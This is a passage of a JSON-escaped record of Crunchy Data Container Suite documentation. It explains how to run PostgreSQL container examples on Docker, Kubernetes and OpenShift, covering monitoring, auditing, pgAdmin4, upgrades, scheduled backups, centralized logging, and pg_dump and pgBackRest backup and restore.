the collect hostname must be specified as an environment\nvariable.\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nTo start this set of containers, run the following:\n....\ncd $CCPROOT\/examples\/docker\/metrics\n.\/run.sh\n....\n\nYou will be able to access the Grafana and Prometheus services from the following\nweb addresses:\n\n * Grafana (http:\/\/0.0.0.0:3000)\n * Prometheus (http:\/\/0.0.0.0:9090)\n\nThe crunchy-postgres container is accessible on port *5432*.\n\n==== Kubernetes and OpenShift\n\nRunning the example:\n....\ncd $CCPROOT\/examples\/kube\/metrics\n.\/run.sh\n....\n\nIt's required to use `port-forward` to access the Grafana dashboard. To start the\nport-forward, run the following command:\n\n....\n${CCP_CLI} port-forward metrics 3000:3000\n${CCP_CLI} port-forward metrics 9090:9090\n....\n\n * Grafana dashboard can be then accessed from `http:\/\/127.0.0.01:3000`\n * Prometheus dashboard can be then accessed from `http:\/\/127.0.0.01:9090`\n\nYou can view the container logs using these command:\n....\n${CCP_CLI} logs -c grafana metrics\n${CCP_CLI} logs -c prometheus metrics\n${CCP_CLI} logs -c collect primary-metrics\n${CCP_CLI} logs -c postgres primary-metrics\n${CCP_CLI} logs -c collect replica-metrics\n${CCP_CLI} logs -c postgres replica-metrics\n....\n\n=== pg_audit\n\nThis example provides an example of enabling pg_audit output.\nAs of release 1.3, pg_audit is included in the crunchy-postgres\ncontainer and is added to the PostgreSQL shared library list in\n`postgresql.conf`.\n\nGiven the numerous ways pg_audit can be configured, the exact\npg_audit configuration is left to the user to define. pg_audit\nallows you to configure auditing rules either in `postgresql.conf`\nor within your SQL script.\n\nFor this test, we place pg_audit statements within a SQL script\nand verify that auditing is enabled and working. If you choose\nto configure pg_audit via a `postgresql.conf` file, then you will\nneed to define your own custom file and mount it to override the\ndefault `postgresql.conf` file.\n\n==== Docker\n\nRun the following to create a database container:\n....\ncd $CCPROOT\/examples\/docker\/pgaudit\n.\/run.sh\n....\n\nThis starts an instance of the pg_audit container (running crunchy-postgres)\non port 12005 on localhost. The test script is then automatically executed.\n\nThis test executes a SQL file which contains pg_audit configuration\nstatements as well as executes some basic SQL commands. These\nSQL commands will cause pg_audit to create log messages in\nthe `pg_log` log file created by the database container.\n\n==== Kubernetes and OpenShift\n\nRun the following:\n....\ncd $CCPROOT\/examples\/kube\/pgaudit\n.\/run.sh\n....\n\nThis script will create a PostgreSQL pod with the pgAudit extension configured and ready\nto use\n\nOnce the pod is deployed successfully run the following command to test the extension:\n\n....\ncd $CCPROOT\/examples\/kube\/pgaudit\n.\/test-pgaudit.sh\n....\n\nThis example has been configured to log directly to stdout of the pod. To view the PostgreSQL logs\nrun the following:\n\n....\n$CCP_CLI logs pgaudit\n....\n","old_contents":"---\ntitle: \"Kubernetes and Openshift\"\ndate: 2018-05-15T08:30:41-07:00\ndraft: false\n---\n\n:toc:\nLatest Release: 2.2.0 {docdate}\n\n== Getting Started\n\n{{% notice warning %}}\nThe Kubernetes and OpenShift examples provided on this page have been designed using single-node Kubernetes\/OCP clusters\nwhose host machines provide any required supporting infrastructure or services (e.g. local hostPath storage or access\nto an NFS share). Therefore, for the best results when running these examples, it is recommended that you utilize a \nsingle-node architecture as well.\n{{% \/notice %}}\n\n{{% notice tip %}}\nThe examples located in the *kube* directory work on both Kubernetes and OpenShift. Ensure the `CCP_CLI` environment variable\nis set to the correct binary for your environment.\n{{% \/notice %}}\n\nSet the environment variable in `.bashrc` to ensure the examples will work in your environment.\n....\n# Kubernetes\nexport CCP_CLI=kubectl\n\n# OpenShift\nexport CCP_CLI=oc\n....\n\nHere are some useful resources for finding the right commands to troubleshoot & modify containers in\nthe various environments shown in this guide:\n\n* link:http:\/\/www.bogotobogo.com\/DevOps\/Docker\/Docker-Cheat-Sheet.php[Docker Cheat Sheet]\n* link:https:\/\/kubernetes.io\/docs\/user-guide\/kubectl-cheatsheet\/[Kubectl Cheat Sheet]\n* link:https:\/\/github.com\/nekop\/openshift-sandbox\/blob\/master\/docs\/command-cheatsheet.md[OpenShift Cheat Sheet]\n* link:https:\/\/github.com\/kubernetes\/helm\/blob\/master\/docs\/using_helm.md[Helm Cheat Sheet]\n\n== Example Conventions\n\nThe examples provided in Container Suite are simple examples that\nare meant to demonstrate key Container Suite features. These\nexamples can be used to build more production level deployments\nas dictated by user requirements specific to their operating\nenvironments.\n\nThe examples generally follow these conventions:\n\n * There is a *run.sh* script that you will execute to start the example.\n * There is a *cleanup.sh* script that you will execute to shutdown and cleanup the example.\n * Each example will create resources such as Secrets, ConfigMaps, Services, and PersistentVolumeClaims, all which follow a naming convention of *<example name>-<optional description suffix>*. For example an example called *primary* might have a PersistentVolumeClaim called *primary-pgconf* to describe the purpose of that particular PVC.\n * The folder names for each example give a clue as to which Container Suite feature it demonstrates. For instance, the *examples\/kube\/pgaudit* example demonstrates how to enable the pg_audit capability of the crunchy-postgres container.\n\n== Administration\n\n=== Password Management\n\nThe passwords used for the PostgreSQL user accounts are generated\nby the OpenShift `process` command. To inspect what value is\nsupplied, you can inspect the primary pod as follows:\n\n....\n${CCP_CLI} get pod pr-primary -o json | grep -C 1 'PG_USER\\|PG_PASSWORD\\|PG_DATABASE'\n....\n\nThis will give you the environment variable values for the database created by default\nin addition to the username and password of the standard user.\n\n * `PG_USER`\n * `PG_PASSWORD`\n * `PG_DATABASE`\n\n=== Kubernetes Secrets\n\nYou can use Kubernetes Secrets to set and maintain your database\ncredentials. Secrets requires you base64 encode your user and password\nvalues as follows:\n....\necho -n 'myuserid' | base64\n....\n\nYou will paste these values into your JSON secrets files for values.\n\nThis example allows you to set the PostgreSQL passwords\nusing Kubernetes Secrets.\n\nThe secret uses a base64 encoded string to represent the\nvalues to be read by the container during initialization. The\nencoded password value is *password*. Run the example\nas follows:\n\n....\ncd $CCPROOT\/examples\/kube\/secret\n.\/run.sh\n....\n\nThe secrets are mounted in the `\/pguser`, `\/pgprimary`, and `\/pgroot` volumes within the\ncontainer and read during initialization. The container\nscripts create a PostgreSQL user with those values, and sets the passwords\nfor the primary user and PostgreSQL superuser using the mounted secret volumes.\n\nWhen using secrets, you do *NOT* have to specify the following\nenvironment variables if you specify all three secrets volumes:\n\n * `PG_USER`\n * `PG_PASSWORD`\n * `PG_ROOT_PASSWORD`\n * `PG_PRIMARY_USER`\n * `PG_PRIMARY_PASSWORD`\n\nYou can test the container as follows. In all cases, the password is *password*:\n....\npsql -h secret -U pguser1 postgres\npsql -h secret -U postgres postgres\npsql -h secret -U primaryuser postgres\n....\n\n=== pgAdmin4\n\nThis example deploys the pgadmin4 v2 web user interface\nfor PostgreSQL without TLS.\n\nAfter running the example, you should be able to browse to http:\/\/127.0.0.1:5050\nand log into the web application with the following configured credentials:\n\n * Username : *admin@admin.com*\n * Password: *password*\n\nIf you are running this example using Kubernetes or\nOpenShift, it is required to use a port-forward proxy to access the dashboard.\n\nTo start the port-forward proxy run the following:\n\n....\n${CCP_CLI} port-forward pgadmin4-http 5050:5050\n....\n\nTo access the pgAdmin4 dashboard through the proxy, navigate to *http:\/\/127.0.0.1:5050*\nin a browser.\n\nSee the link:http:\/\/pgadmin.org[pgAdmin4 documentation] for more details.\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nTo run this example, run the following:\n....\ncd $CCPROOT\/examples\/docker\/pgadmin4-http\n.\/run.sh\n....\n\n==== Kubernetes and OpenShift\n\nStart the container as follows:\n....\ncd $CCPROOT\/examples\/kube\/pgadmin4-http\n.\/run.sh\n....\n\n{{% notice tip %}}\nAn emptyDir with write access must be mounted to the `\/run\/httpd` directory in OpenShift.\n{{% \/notice %}}\n\n=== pgAdmin4 with TLS\n\nThis example deploys the pgadmin4 v2 web user interface\nfor PostgreSQL with TLS.\n\nAfter running the example, you should be able to browse to https:\/\/127.0.0.1:5050\nand log into the web application with the following configured credentials:\n\n * Username : *admin@admin.com*\n * Password: *password*\n\nIf you are running this example using Kubernetes or\nOpenShift, it is required to use a port-forward proxy to access the dashboard.\n\nTo start the port-forward proxy run the following:\n\n....\n${CCP_CLI} port-forward pgadmin4-https 5050:5050\n....\n\nTo access the pgAdmin4 dashboard through the proxy, navigate to *https:\/\/127.0.0.1:5050*\nin a browser.\n\nSee the link:http:\/\/pgadmin.org[pgadmin4 documentation] for more details.\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nTo run this example, run the following:\n....\ncd $CCPROOT\/examples\/docker\/pgadmin4-https\n.\/run.sh\n....\n\n==== Kubernetes and OpenShift\n\nStart the container as follows:\n....\ncd $CCPROOT\/examples\/kube\/pgadmin4-https\n.\/run.sh\n....\n\n{{% notice tip %}}\nAn emptyDir with write access must be mounted to the `\/run\/httpd` directory in OpenShift.\n{{% \/notice %}}\n\n=== Upgrade\n\n{{% notice tip %}}\nThis example assumes you have run *primary* using a PG 9.5 or 9.6 image\nsuch as `centos7-9.5.14-2.2.0` prior to running this upgrade.\n{{% \/notice %}}\n\nStarting in release 1.3.1, the upgrade container will let\nyou perform a `pg_upgrade` either from a PostgreSQL version 9.5 database to\n9.6 or from 9.6 to 10.\n\nPrior to running this example, make sure your `CCP_IMAGE_TAG`\nenvironment variable is using the next major version of PostgreSQL that you\nwant to upgrade to. For example, if you're upgrading from 9.5 to 9.6, make\nsure the variable references a PG 9.6 image such as `centos7-9.6.10-2.2.0`.\n\nThis will create the following in your Kubernetes environment:\n\n * a Kubernetes Job running the *crunchy-upgrade* container\n * a new data directory name *upgrade* found in the *pgnewdata* PVC\n\n{{% notice tip %}}\nData checksums on the Crunchy PostgreSQL container were enabled by default in version 2.1.0.\nWhen trying to upgrade, it's required that both the old database and the new database\nhave the same data checksums setting. Prior to upgrade, check if `data_checksums`\nwere enabled on the database by running the following SQL: `SHOW data_checksums`\n{{% \/notice %}}\n\n==== Kubernetes and OpenShift\n\n{{% notice tip %}}\nBefore running the example, ensure you edit `upgrade.json` and update the `OLD_VERSION`\nand `NEW_VERSION` parameters to the ones relevant to your situation.\n{{% \/notice %}}\n\nStart the upgrade as follows:\n....\ncd $CCPROOT\/examples\/kube\/upgrade\n.\/run.sh\n....\n\nIf successful, the Job will end with a **successful** status. Verify\nthe results of the Job by examining the Job's pod log:\n....\n${CCP_CLI} get pod -l job-name=upgrade\n${CCP_CLI} logs -l job-name=upgrade\n....\n\nYou can verify the upgraded database by running the `post-upgrade.sh` script in the\n`examples\/kube\/upgrade` directory. This will create a PostgreSQL pod that mounts the\nupgraded volume.\n\n=== Crunchy Scheduler\n\nThe Crunchy Scheduler container implements a cronlike microservice within a namespace\nto automate backups of a PostgreSQL database.\n\nCurrently Crunchy Scheduler only supports two types of tasks:\n\n* pgBackRest\n* pgBaseBackup\n\nThis service watches Kubernetes for config maps with the label `crunchy-scheduler=true`.\nIf found the scheduler will parse the data found in the config map (json object) and\nconvert it to a scheduled task. If the config map is removed, the scheduler will\ndelete the task.\n\nSee the following examples for creating config maps that Crunchy Scheduler can parse:\n\n* link:https:\/\/github.com\/CrunchyData\/crunchy-containers\/blob\/scheduler\/examples\/kube\/scheduler\/configs\/schedule-backrest-diff.json[pgBackRest Diff Backup]\n* link:https:\/\/github.com\/CrunchyData\/crunchy-containers\/blob\/scheduler\/examples\/kube\/scheduler\/configs\/schedule-backrest-full.json[pgBackRest Full Backup]\n* link:https:\/\/github.com\/CrunchyData\/crunchy-containers\/blob\/scheduler\/examples\/kube\/scheduler\/configs\/schedule-pgbasebackup.json[pgBaseBackup Backup]\n\nThe Crunchy Scheduler requires a Service Account to create jobs (pgBaseBackup) and to\nexec (pgBackRest). See the link:https:\/\/github.com\/CrunchyData\/crunchy-containers\/blob\/scheduler\/examples\/kube\/scheduler\/scheduler-sa.json[scheduler example]\nfor the required permissions on this account.\n\n==== pgBackRest Schedules\n\nTo configure Crunchy Scheduler to create pgBackRest backups the following is required:\n\n* pgBackRest schedule definition requires a deployment name. The PostgreSQL pod should be created by a deployment.\n\n==== pgBaseBackup Schedules\n\nTo configure Crunchy Scheduler to create pgBaseBackup scheduled backups, the following is required:\n\n* The name of the secret that contains the username and password the Scheduler will use to\n configure the job template. See link:https:\/\/github.com\/CrunchyData\/crunchy-containers\/blob\/scheduler\/examples\/kube\/scheduler\/primary\/secret.json[the primary secret example].\n for the structure required by the Scheduler.\n* The name of the PVC created for the backups. This should be created by the user prior to scheduling the task.\n\n==== Kubernetes and OpenShift\n\nFirst, start the PostgreSQL example created for the Scheduler by running the following commands:\n\n....\n# Kubernetes\ncd $CCPROOT\/examples\/kube\/scheduler\/primary\n.\/run.sh\n....\n\nThe pod created should show a ready status before proceeding.\n\nNext, start the scheduler by running the following command:\n\n....\n# Kubernetes\ncd $CCPROOT\/examples\/kube\/scheduler\n.\/run.sh\n....\n\nOnce the scheduler is deployed, register the backup tasks by running the following command:\n\n....\n# Kubernetes\ncd $CCPROOT\/examples\/kube\/scheduler\n.\/add-schedules.sh\n....\n\nThe scheduled tasks will (these are just for fast results, not recommended for production):\n\n* take a backup every minute using pgBaseBackup\n* take a full pgBackRest backup every even minute\n* take a diff pgBackRest backup every odd minute\n\nView the logs for the `scheduler` pod until the tasks run:\n\n....\n${CCP_CLI?} logs scheduler -f\n....\n\nView the `pgBaseBackup` pods results after the backup completes:\n\n....\n${CCP_CLI?} logs <basebackup pod name>\n....\n\nView the `pgBackRest` backups via exec after the backup completes:\n\n....\n${CCP_CLI?} exec -ti <primary deployment pod name> -- pgbackrest info\n....\n\nClean up the examples by running the following commands:\n\n....\n$CCPROOT\/examples\/kube\/scheduler\/primary\/cleanup.sh\n$CCPROOT\/examples\/kube\/scheduler\/cleanup.sh\n....\n\n=== Vacuum\n\nYou can perform a PostgreSQL vacuum command by running the crunchy-vacuum\ncontainer. You specify a database to vacuum using environment variables. By default,\nvacuum is executed against the *primary* example container.\n\nThe crunchy-vacuum container image exists to allow a DBA a way to run a job either\nindividually or scheduled to perform a variety of vacuum operations.\n\nThis example performs a vacuum on a single table in the primary PostgreSQL\ndatabase. The crunchy-vacuum image is executed with the PostgreSQL connection\nparameters to the single-primary PostgreSQL container. The type of vacuum performed is\ndictated by the environment variables passed into the job; these are defined with further detail\nlink:\/container-specifications\/crunchy-vacuum[here].\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nRun the example as follows:\n....\ncd $CCPROOT\/examples\/docker\/vacuum\n.\/run.sh\n....\n\n==== Kubernetes and OpenShift\n\nRunning the example:\n....\ncd $CCPROOT\/examples\/kube\/vacuum\/\n.\/run.sh\n....\n\nVerify the job is completed:\n....\n${CCP_CLI} get job\n....\n\n=== systemd\n\nThe crunchy-pg.service is an example of a systemd unit file\nthat starts and stops a container named crunchy-pg that\nhas already been created.\n\nThe example scripts are located in the following directory:\n....\n$CCPROOT\/examples\/systemd\/\n....\n\nThere are two scripts within the directory.\n\n....\ntest-start.sh\n....\n\nThis script is called by the systemd start execution. The trick\nwith this script is that it blocks forever after starting the\ndocker crunchy-pg container. The blocking in the script\nkeeps systemd happy and thinking that this is a normal daemon.\n\n....\ntest-stop.sh\n....\n\nThis script stops the test-start.sh script and also stops the\ncrunchy-pg Docker container.\n\n=== Centralized Logging\n\nThe logs generated by containers are critical for deployments because they provide insights into the\nhealth of the system. PostgreSQL logs are very detailed and there is some information that can only be\nobtained from logs (but not limited to):\n\n* Connections and Disconnections of users\n* Checkpoint Statistics\n* PostgreSQL Server Errors\n\nAggregrating container logs across multiple hosts allows administrators to audit, debug problems and prevent\nrepudiation of misconduct.\n\nIn the following example we will demonstrate how to setup Kubernetes and OpenShift to use centralized logging by using\nan EFK (Elasticsearch, Fluentd and Kibana) stack. Fluentd will run as a daemonset on each host within the Kubernetes\ncluster and extract container logs, Elasticsearch will consume and index the logs gathered by Fluentd and Kibana will allow\nusers to explore and visualize the logs via a web dashboard.\n\nTo learn more about the EFK stack, see the following:\n\n* https:\/\/www.elastic.co\/products\/elasticsearch\n* https:\/\/www.fluentd.org\/architecture\n* https:\/\/www.elastic.co\/products\/kibana\n\n==== Configure PostgreSQL for Centralized Logging\n\nBy default, Crunchy PostgreSQL logs to files in the `\/pgdata` directory. In order to get the logs\nout of the container we need to configure PostgreSQL to log to `stdout`.\n\nThe following settings should be configured in `postgresql.conf` to make PostgreSQL log to `stdout`:\n\n```\nlog_destination = 'stderr'\nlogging_collector = off\n```\n\n{{% notice warning %}}\nChanges to logging settings require a restart of the PostgreSQL container to take effect.\n{{% \/notice %}}\n\n==== Deploying the EFK Stack On OpenShift Container Platform\n\nOpenShift Container Platform can be installed with an EFK stack. For more information about\nconfiguring OpenShift to create an EFK stack, see the official documentation:\n\n* https:\/\/docs.openshift.com\/container-platform\/3.10\/install_config\/aggregate_logging.html\n\n==== Deploying the EFK Stack On Kubernetes\n\nFirst, deploy the EFK stack by running the example using the following commands:\n\n....\ncd $CCPROOT\/examples\/kube\/centralized-logging\/efk\n.\/run.sh\n....\n\n{{% notice warning %}}\nElasticsearch is configured to use an `emptyDir` volume in this example. Configure this example to provide a\npersistent volume when deploying into production.\n{{% \/notice %}}\n\n\nNext, verify the pods are running in the `kube-system` namespace:\n\n```\n${CCP_CLI?} get pods -n kube-system --selector=k8s-app=elasticsearch-logging\n${CCP_CLI?} get pods -n kube-system --selector=k8s-app=fluentd-es\n${CCP_CLI?} get pods -n kube-system --selector=k8s-app=kibana-logging\n```\n\nIf all pods deployed successfully elasticsearch should already be receiving container logs from Fluentd.\n\nNext we will deploy a PostgreSQL Cluster (primary and replica deployments) to demonstrate PostgreSQL logs\nare being captured by Fluentd.\n\nDeploy the PostgreSQL cluster by running the following:\n\n....\ncd $CCPROOT\/examples\/kube\/centralized-logging\/postgres-cluster\n.\/run.sh\n....\n\nNext, verify the pods are running:\n\n....\n${CCP_CLI?} get pods --selector=k8s-app=postgres-cluster\n....\n\nWith the PostgreSQL successfully deployed, we can now query the logs in Kibana.\n\nWe will need to setup a port-forward to the Kibana pod to access it. To do that\nwe first get the name of the pod by running the following command:\n\n....\n${CCP_CLI?} get pod --selector=k8s-app=kibana-logging -n kube-system\n....\n\nNext, start the port-forward:\n\n....\n${CCP_CLI?} port-forward <KIBANA POD NAME> 5601:5601 -n kube-system\n....\n\nTo access the web dashboard navigate in a browser to `127.0.0.1:5601`.\n\nFirst, click the `Discover` tab and setup an index pattern to use for queries.\n\nThe index pattern name we will use is `logstash-*` because Fluentd is configured to\ngenerate logstash style logs.\n\nNext we will configure the `Time Filter field name` to be `@timestamp`.\n\nNow that our index pattern is created, we can query for the container logs.\n\nClick the `Discover` tab and use the following queries:\n\n....\n# KUBERNETES\nCONTAINER_NAME: *primary* AND MESSAGE: \".*LOG*\"\n# OpenShift\nkubernetes.pod_name: \"primary\" AND log\n....\n\nFor more information about querying Kibana, see the official documentation: https:\/\/www.elastic.co\/guide\/en\/beats\/packetbeat\/current\/kibana-queries-filters.html\n\n== Backup and Restoration\n\n=== pg_dump\n\nThe script assumes you are going to backup the *primary* example and that container\nis running.\n\nThis example assumes you have configured a storage filesystem as described\nin the link:\/installation\/storage-configuration\/[Storage Configuration] document.\n\nA successful backup will perform pg_dump\/pg_dumpall on the primary and store\nthe resulting files in the mounted volume under a directory named `<HOSTNAME>-backups`\nas a sub-directory, then followed by a unique backup directory based upon a\ndate and timestamp - allowing any number of backups to be kept.\n\nFor more information on how to configure this container, please see the link:\/container-specifications\/[Container Specifications] document.\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nRun the backup with this command:\n....\ncd $CCPROOT\/examples\/docker\/pgdump\n.\/run.sh\n....\n\n==== Kubernetes and OpenShift\n\nRunning the example:\n....\ncd $CCPROOT\/examples\/kube\/pgdump\n.\/run.sh\n....\n\nThe Kubernetes Job type executes a pod and then the pod exits. You can\nview the Job status using this command:\n....\n${CCP_CLI} get job\n....\n\nThe `pgdump.json` file within that directory specifies options that control the behavior of the pgdump job.\nExamples of this include whether to run pg_dump vs pg_dumpall and advanced options for specific backup use cases.\n\n=== pg_restore\n\nThe script assumes you are going to restore to the *primary* example and that container\nis running and a backup has been created using the `pgdump` example..\n\nThis example assumes you have configured a storage filesystem as described\nin the link:\/installation\/storage-configuration\/[Storage Configuration] document.\n\nSuccessful use of the `crunchy-pgrestore` container will run a job to restore files generated by\npg_dump\/pg_dumpall to a container via psql\/pg_restore; then container will terminate successfully\nand signal job completion.\n\nFor more information on how to configure this container, please see the link:\/container-specifications\/[Container Specifications] document.\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nRun the restore with this command:\n....\ncd $CCPROOT\/examples\/docker\/pgrestore\n.\/run.sh\n....\n\n==== Kubernetes and OpenShift\n\nBy default, pgrestore container will automatically restore from the most recent backup.\nIf you want to restore to a specific backup, edit the `pgrestore.json` file and update the\n`PGRESTORE_BACKUP_TIMESTAMP` setting to specify the backup path you want to restore with. For example:\n....\n\"name\":\"PGRESTORE_BACKUP_TIMESTAMP\",\n\"value\":\"2018-03-27-14-35-33\"\n....\n\nRunning the example:\n....\ncd $CCPROOT\/examples\/kube\/pgrestore\n.\/run.sh\n....\n\nThe Kubernetes Job type executes a pod and then the pod exits. You can\nview the Job status using this command:\n....\n${CCP_CLI} get job\n....\n\nThe `pgrestore.json` file within that directory specifies options that control the behavior of the pgrestore job.\n\n=== pgBackRest\n\npgbackrest is a utility that performs a backup, restore, and archive\nfunction for a PostgreSQL database. pgbackrest is written and\nmaintained by David Steele, and more information can be found on the\nlink:http:\/\/www.pgbackrest.org\/[official website].\n\nBackups are currently performed by manually executing pgbackrest commands against the desired pod.\nRestores can now be performed via the crunchy-backrest-restore container, which offers FULL or\nDELTA restore capability.\n\npgbackrest is configured using a `pgbackrest.conf` file that is\nmounted into the crunchy-postgres container at `\/pgconf`.\n\nIf you place a `pgbackrest.conf` file within this mounted directory, it\nwill trigger the use of pgbackrest within the PostgreSQL container\nas the `archive_command` and will turn on the `archive_mode` to begin\narchival. It is still required to define the `ARCHIVE_TIMEOUT` environment\nvariable within your container configuration as it is set to\na disable value of 0 by default.\n\nThe following changes will be made to the container's `postgresql.conf`\nfile:\n....\nARCHIVE_MODE=on\nARCHIVE_TIMEOUT=60\nARCHIVE_COMMAND='pgbackrest --stanza=db archive-push %p'\n....\n\nIf you are using a crunchy-postgres image older than 1.7.1, `archive_command` must specify where\nthe `pgbackrest.conf` file is located:\n....\nARCHIVE_COMMAND='pgbackrest --config=\/pgconf\/pgbackrest.conf --stanza=db archive-push %p'\n....\n\n{{% notice warning %}}\nThis requires you use a pgbackrest stanza name of *db* within the\n`pgbackrest.conf` file you mount.\n{{% \/notice %}}\n\nWhen set, WAL files generated by the database will be written\nout to the `\/backrestrepo\/HOSTNAME-backups` mount point.\n\nAdditionally, the Crunchy Postgres container can templatize `pgbackrest.conf` files\nby searching for the HOSTNAME values in a mounted `pgbackrest.conf` file.\n\nFor example, `db-path=\/pgdata\/HOSTNAME` will render to `db-path=\/pgdata\/primary` if\nthe container's hostname is primary. HOSTNAME will be replaced with the value of\n`PGDATA_PATH_OVERRIDE` when working with deployments\/replicasets.\n\n{{% notice warning %}}\nThe templating example above works for `db-path` settings, however, `repo-path` should\nfollow the convention `repo-path=\/backrestrepo\/HOSTNAME-backups` in cases where\nvolumes are being mounted to a single mount point (such as hostPath or NFS). Without\nthe additional `-backups` the backups will populate in the `pgdata` directory.\n{{% \/notice %}}\n\n==== Kubernetes and OpenShift\n\n===== Backup\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/kube\/backrest\/backup\n.\/run.sh\n....\n\nThis will create the following in your Kubernetes environment:\n\n * configMap containing `pgbackrest.conf`\n * PostgreSQL pod with pgBackRest configured\n * PostgreSQL service\n * PVC for the PGDATA directory\n * PVC for the BackRest Backups and Archives directory\n\nExamine the `\/backrestrepo` location to view the archive directory and ensure WAL archiving is working.\n\nYou can create a backup using backrest using this command within the container:\n....\n${CCP_CLI} exec -it backrest \/bin\/bash\npgbackrest --stanza=db backup --type=full\n....\n\n===== Async Archiving\n\npgBackRest supports asyncronous archiving to pull and push Write Ahead Logs.\nAsynchronous operation is more efficient because it can reuse connections and take\nadvantage of parallelism. For more information on async archiving, see the pgBackRest\nlink:https:\/\/pgbackrest.org\/user-guide.html#async-archiving[official documentation].\n\nThis will create the following in your Kubernetes environment:\n\n * configMap containing `pgbackrest.conf`\n * PostgreSQL pod with pgBackRest configured and archiving asynchronously.\n * PostgreSQL service\n * PVC for the PGDATA directory\n * PVC for the BackRest Backups and Archives directory\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/kube\/backrest\/async-archiving\n.\/run.sh\n....\n\nExamine the `\/backrestrepo\/HOSTNAME-backups` location to view the archive directory\nand ensure WAL archiving is working.\n\nExamine the `\/pgdata\/HOSTNAME-spool` location to view the transient directory\nused for async archiving.\n\nYou can create a backup using backrest using this command within the container:\n....\n${CCP_CLI} exec -it backrest-async-archive \/bin\/bash\npgbackrest --stanza=db backup\n....\n\n{{% notice warning %}}\nA spooling directory is automatically created in both `\/pgdata` and `\/pgwal`. It is\nadvised to configure pgBackRest to use the spooling location closest to the Write Ahead Log.\n\nIf the PostgreSQL container was created using the `XLOGDIR` variable, the `\/pgwal\/HOSTNAME-spool`\ndirectory should be configured in `pgbackrest.conf` as such: `spool-path=\/pgwal\/HOSTNAME-spool`.\nIf WAL resides on PGDATA, use: `spool-path=\/pgdata\/HOSTNAME-spool`\n{{% \/notice %}}\n\n==== Restore\n\nThere are three options to choose from when performing a restore:\n\n * Delta - only restore missing files from PGDATA\n * Full - restore all files, pgdata must be empty\n * Point in Time Recovery (PITR) - delta restore to a certain point in time\n\n===== PITR\n\n{{% notice tip %}}\nThis example uses the `backrest\/backup` example. It should be left running and a\npgBackRest backup has been created.\n{{% \/notice %}}\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/kube\/backrest\/pitr\n.\/run.sh\n....\n\nThis will create the following in your Kubernetes environment:\n\n * configMap containing `pgbackrest.conf`\n * Backrest-Restore pod with pgBackRest configured for PITR restore\n\npgBackRest will restore the `pgdata` volume mounted to the restore container\nto the point in time specified by the `PITR_TARGET` environment variable. To get\na compliant timestamp, PostgreSQL can be queried using the following SQL:\n\n....\npsql -U postgres -Atc 'select current_timestamp'\n....\n\nAfter a successful restore, run the following to start the restored PostgreSQL container:\n\n....\ncd $CCPROOT\/examples\/kube\/backrest\/pitr\n.\/post-restore.sh\n....\n\n===== Full\n\n{{% notice tip %}}\nThis example uses the `backrest\/backup` example. It does not need to be running but a\npgBackRest backup is required.\n{{% \/notice %}}\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/kube\/backrest\/full\n.\/run.sh\n....\n\nThis will create the following in your Kubernetes environment:\n\n * configMap containing `pgbackrest.conf`\n * Backrest-Restore pod with pgBackRest configured for full restore\n * New PVC for the PGDATA directory (full restores require PGDATA to be empty)\n\npgBackRest will restore all files to the `pgdata` volume mounted to the restore container.\n\nAfter a successful restore, run the following to start the restored PostgreSQL container:\n\n....\ncd $CCPROOT\/examples\/kube\/backrest\/full\n.\/post-restore.sh\n....\n\n===== Delta\n\n{{% notice tip %}}\nThis example uses the `backrest\/backup` example. It does not need to be running but a\npgBackRest backup is required.\n{{% \/notice %}}\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/kube\/backrest\/delta\n.\/run.sh\n....\n\nThis will create the following in your Kubernetes environment:\n\n * configMap containing `pgbackrest.conf`\n * Backrest-Restore pod with pgBackRest configured for full restore\n\npgBackRest will restore files missing to the `pgdata` volume mounted to the restore container.\n\nAfter a successful restore, run the following to start the restored PostgreSQL container:\n\n....\ncd $CCPROOT\/examples\/kube\/backrest\/delta\n.\/post-restore.sh\n....\n\n==== Docker\n\n===== Backup\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/docker\/backrest\/backup\n.\/run.sh\n....\n\nThis will create the following in your Docker environment:\n\n * PostgreSQL container with pgBackRest configured\n * Volume for the PGDATA directory\n * Volume for the `pgbackrest.conf` configuration\n * Volume for the BackRest Backups and Archives directory\n\nExamine the `\/backrestrepo` location to view the archive directory and ensure WAL archiving is working.\n\nYou can create a backup using backrest using this command within the container:\n....\ndocker exec -it backrest \/bin\/bash\npgbackrest --stanza=db backup --type=full\n....\n\n===== Async Archiving\n\nThis will create the following in your Docker environment:\n\n * PostgreSQL container with pgBackRest configured\n * Volume for the PGDATA directory\n * Volume for the `pgbackrest.conf` configuration\n * Volume for the BackRest Backups and Archives directory\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/docker\/backrest\/async-archiving\n.\/run.sh\n....\n\nExamine the `\/backrestrepo\/HOSTNAME-backups` location to view the archive directory\nand ensure WAL archiving is working.\n\nExamine the `\/pgdata\/HOSTNAME-spool` location to view the transient directory\nused for async archiving.\n\nYou can create a backup using backrest using this command within the container:\n....\ndocker exec -it backrest \/bin\/bash\npgbackrest --stanza=db backup\n....\n\n{{% notice warning %}}\nA spooling directory is automatically created in both `\/pgdata` and `\/pgwal`. It is\nadvised to configure pgBackRest to use the spooling location closest to the Write Ahead Log.\n\nIf the PostgreSQL container was created using the `XLOGDIR` variable, the `\/pgwal\/HOSTNAME-spool`\ndirectory should be configured in `pgbackrest.conf` as such: `spool-path=\/pgwal\/HOSTNAME-spool`.\nIf WAL resides on PGDATA, use: `spool-path=\/pgdata\/HOSTNAME-spool`\n{{% \/notice %}}\n\n==== Restore\n\n===== PITR\n\n{{% notice tip %}}\nThis example uses the `backrest\/backup` example. It should be left running and a\npgBackRest backup has been created.\n{{% \/notice %}}\n\nStart the example as follows:\n....\ncd 